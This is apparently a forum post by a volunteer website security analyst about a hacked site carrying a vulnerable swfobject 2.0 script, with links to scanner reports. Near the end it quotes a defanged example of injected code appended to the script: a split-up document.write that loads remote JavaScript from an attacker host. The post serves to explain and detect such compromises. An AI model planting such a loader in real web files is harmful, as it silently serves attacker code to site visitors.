Hacked site with vulnerable script - blocked by Google Safebrowsing...

See: http://www.isithacked.com/check/http%3A%2F%2Fsyzrxy.com%2Ftemplates%2Fcn%2Fscripts%2Fswfobject_modified.js
-http://syzrxy.com/
Detected libraries:
swfobject - 2.0 : -http://syzrxy.com/Templates/cn/Scripts/swfobject_modified.js
Info: Severity: medium
https://code.google.com/p/swfobject/wiki/release_notes
https://code.google.com/p/swfobject/source/detail?r=181
1 vulnerable library detected

See for that hack: http://www.domxssscanner.com/scan?url=http%3A%2F%2Fsyzrxy.com

For this I encounter a Fail: -http://www.opensource.org/licenses/mit-license.php

Three warnings encoungtered here: https://asafaweb.com/Scan?Url=syzrxy.com

polonus

The hacker(s) went passed WAF 2.0 on WWW.Server 0.1
About a possible scenario read here: https://blog.cloudflare.com/inside-shellshock/
But here they apparently used

Scripts/swfobject_modified.js

see: https://stackoverflow.com/questions/30051696/unfamiliar-javascript-syntax-hack
another way to abuse is when website is using this external js file

hxxp:// www . something hackable . com /Scripts/swfobject_modified.js

and then it is hacked with the following line of code at the end

document.write (‘< s’+‘cript type˜ “text/javascript” src˜ “hxxp:// bobo . whatsup . info : 8080/Gibibyte.js”> < /scr’+'ipt> ');
Above example code credits go to redleg, a g33k and website security analyst that taught me quite a lot via the scans on redleg’s fileviewer.
Changed the example to such an extent it cannot longer be identified. :wink: pol.
Also read here: http://www.elxis.org/blog/external-js-files.html

polonus (volunteer website security analyst and website error-hunter)